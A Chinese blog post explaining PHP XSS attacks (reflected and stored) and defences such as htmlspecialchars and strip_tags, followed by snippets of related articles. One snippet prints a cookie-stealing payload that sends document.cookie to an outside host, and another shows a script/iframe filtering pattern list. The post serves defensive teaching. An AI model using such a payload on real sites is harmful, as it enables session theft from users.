php安全(二):xss攻击

最新推荐文章于 2025-06-12 00:16:09 发布
最新推荐文章于 2025-06-12 00:16:09 发布
阅读量424 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: PHP web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/llllllloooooo/article/details/80492858
本文介绍了XSS(跨站脚本攻击)的概念及其两种主要类型:反射型和存储型攻击,并详细解释了这两种类型的攻击方式及可能造成的危害。此外,还提供了几种防御XSS攻击的方法,包括使用htmlspecialchars函数进行转义、利用正则表达式过滤HTML标签以及采用PHP内置的strip_tags函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

   XSS 全称为 Cross Site Scripting,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,进而达到某些人的攻击目的。

分类
1、XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。

2、XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如:某CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的XSS存储型攻击。

危害
1.窃取cookies,读取目标网站的cookie发送到黑客的服务器上

2.读取用户未公开的资料,如果:邮件列表或者内容、系统的客户资料,联系人列表等等

防御

1、最简单的处理办法,只需要在接受数据处理的时候用上过滤函数htmlspecialchars,这个函数会把代码中的特殊字符转义成HTML实体,输出的时候就不会影响页面了

htmlspecialchars($_POST['content']);

2、另一种方法是直接过滤掉html标签,这里要用到正则表达式

<?php
        $rege = '/<\/?[^>]+>/';
        $result = preg_replace($rege,"",$_POST['content']);
        echo $result;

    ?>

3、PHP提供了一个内置的strip_tags函数可以出去字符串中HTML和PHP标签,仅保留参数中指定的标签

<?php

        $str = '<p>Test parjlkasdf </p><a href="#test">Other text</a>';
        echo strip_tags($str);
        echo "</br>";
        echo strip_tags($str,'<p> <a>');//允许p标签和a标签
    ?>

PHP 安全:使用 CSRF 令牌防止 XSS 攻击
新华编程特战队
04-25 1884
在动态的 Web 开发环境中,安全性仍然是一个最重要的问题。跨站点脚本(XSS) 和跨站点请求伪造(CSRF) 是 PHP 开发人员必须解决的两个普遍安全漏洞,以保护其应用程序。本文深入探讨了 XSS 攻击的复杂性,探讨了 CSRF 漏洞,并讨论了 CSRF 令牌在防止这些威胁方面的作用。此外,我们将指导您在 PHP 中实现 CSRF 代币,并引入补充安全措施。
php_XSS攻击插件
05-29
php编辑器或者文本域获取js传值 js写入防止被攻击XSS;有demo使用手册
php xss攻击
技术的搬运工
01-29 1082
xss攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括php、VBScript、ActiveX、 Flash 或者甚至是普通的HTML。
PHP中防止XSS(跨站脚本攻击)的主要方法
最新发布
深山技术宅的博客
06-12 412
PHPXSS攻击方案摘要(148字): PHP防范XSS攻击的核心措施包括:使用htmlspecialchars()或htmlentities()转义HTML输出,设置Content Security Policy(CSP)头部限制脚本来源,通过filter_var()过滤输入数据。推荐采用模板引擎自动转义,并设置HTTP-only Cookie保护敏感信息。最佳实践强调输入验证、输出转义和白名单机制,特别需警惕用户输入直接输出到HTML、JavaScript、URL或CSS的场景。同时应保持PHP及依赖
PHP漏洞全解()-PHP网站的安全性问题
老鹰之歌的学习笔记
09-21 1399
本文主要介绍针对PHP网站常见的攻击方式,包括常见的sql注入,跨站等攻击类型。同时介绍了PHP的几个重要参数设置。后面的系列文章将站在攻击者的角度,为你揭开PHP安全问题,同时提供相应应对方案。 针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户
PHP防范XSS攻击
IT部落格
03-03 2921
定义 XSS(Cross Site Scripting)攻击,中文名为跨站脚本攻击,是一种常见的网页攻击方式。 攻击者在web页面中插入一些恶意的javascript或HTML代码,当用户浏览该页面的时候,嵌入到web页面中的javascript/HTML代码会被执行,从而达到攻击目的。 一个简单的例子就是网页中的评论功能,用户编写一段javascript代码(见下面)提交到服务器,如果不做过滤就直接显示出来的话,就会导致用户一打开页面就会有弹窗提示“你被攻击了”。 <script>window
php解决XSS攻击
php-yyds
12-27 1856
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的Web应用程序安全漏洞。它允许攻击者将恶意脚本注入到受害者的浏览器中,并在受害者访问受漏洞影响的网页时执行这些恶意脚本。XSS攻击通常发生在Web应用程序对用户输入的处理过程中。攻击者可以利用未经过滤或转义的用户输入,将恶意的HTML、JavaScript或其他脚本注入到网页中。当其他用户访问这个被攻击的页面时,将执行这些恶意脚本,导致安全问题。
信息安全技术基础:XSS攻击概述.pptx
11-01
XSS攻击详解】 ...总结,XSS攻击是信息安全领域的重要议题,理解其原理和类型对于构建安全的Web应用至关重要。开发者需要时刻警惕,采取有效措施防止此类攻击的发生,保护用户的隐私和数据安全
Web应用安全XSS盗取cookiepayload.pptx
06-18
Web应用安全领域中,XSS(跨站脚本攻击)是一种常见的...总之,理解XSS攻击和Cookie盗取的原理,并采取有效的防护措施,对于保护Web应用的安全至关重要。开发者和用户都需要对此保持警惕,以抵御潜在的网络安全威胁。
PHP如何防止XSS攻击XSS攻击原理的讲解
10-17
7. 安全库和框架:利用成熟的PHP安全库和框架,这些通常已经内置了很多安全特性和过滤器,可以减少XSS攻击的风险。 8. 教育和培训:对于开发团队进行安全意识教育和培训,让每个开发人员都意识到安全编码的重要性,...
PHPXSS攻击
weixin_30568591的博客
04-27 114
XSS攻击 什么是XSS攻击 代码实例: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>XSS原理重现</title> </head> <body> <f...
PHP跨站脚本攻击XSS)防范方案
m0_66326520的博客
04-09 1658
反射型XSS攻击是将注入的恶意脚本添加到一个网址中,然后给用户发送这个网址。一旦用户打开这个网址,就会执行脚本并导致攻击攻击负载和脚本跟随用户点击链接,并被嵌入到响应中,在浏览器上执行。存储型 XSS 攻击指的是攻击者将恶意脚本提交到受害网站的数据库中,当其他用户浏览包含该恶意脚本链接的页面时,就会执行该脚本,从而导致攻击者的目的得以实现。由于是将恶意脚本保存在数据库中,所有访问包含恶意代码的页面的用户都受到攻击。而且这种攻击方式难解决。
PHP防止XSS注入
康师父Blog
08-07 1024
function removeXSS($input) { $patterns = array (); $patterns [] = '/&lt;script.*&gt;.*&lt;\/script&gt;/siU'; $patterns [] = '/&lt;iframe.*&gt;.*&lt;\/iframe&gt;/siU'; $patterns [] = '/&lt...
php web基础教程之xss攻击
xiao_qing_ge的博客
12-20 316
先介绍一下xss攻击是什么: XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和co...
php+防御+xss,PHP防御XSS攻击
weixin_39777464的博客
04-04 200
XSS即跨站脚本工具例如我在你的评论上写了alert('楼主傻逼');然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下document.location="http://www.test.com/a.php?b="+document.cookie;通过这种方式,你的所有cookie就会被发送到对应的网站去,然后你就呵呵了~~~~所以我们应该要过滤掉...
PHP网页xss攻击测试用例,Web安全测试 | xss攻击
weixin_29357243的博客
03-22 573
xss攻击的全称是Cross-Site Scripting (XSS)攻击,是一种注入式攻击。基本的做法是把恶意代码注入到目标网站。由于浏览器在打开目标网站的时候并不知道哪些脚本是恶意的,所以浏览器会无差别执行恶意脚本,从而导致用户信息和一些敏感信息被盗取和泄漏。xss一般分为两种类型,持久化的xss和非持久化的xss。持久化xss下面这个例子演示了攻击者如何通过注入恶意代码去盗取用户的cooki...
PHP进行安全字段和防止XSS跨站脚本攻击过滤(通用版)
拾叁
06-10 1190
使用方式:1)写在公共方法里面,随时调用即可。2)写入类文件,使用是include_once 即可/* 进行安全字段和xss跨站脚本攻击过滤(通用版) -xzz */ function escape($string) { global $_POST; $search = array ( '/&lt;/i', '/&gt;/i', '...
防止XSS攻击封装
weixin_30682415的博客
08-12 439
<?php if (!function_exists('remove_xss')) { //使用htmlpurifier防范xss攻击 function remove_xss($string){ //composer安装的,不需要此步骤。相对index.php入口文件,引入HTMLPurifier.auto.php核心文件 // ...
xss攻击解决方案php项目,PHP XSS跨站攻击解决方案
weixin_39996798的博客
03-11 140
PHP XSS跨站攻击解决方案,在网上搜索了下,大概都是这个函数,但是说实话,真的没有完全理解这个函数的含义。首先是使用十六进制替换所有特殊字符,然后将传入的字符串完全用字母符号代替。最后一步就不是太理解了。先放着,慢慢研究吧。关于跨站攻击的几个网站:http://chriscook.me/web-development/php-preventing-typical-xss-attacks/htt...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值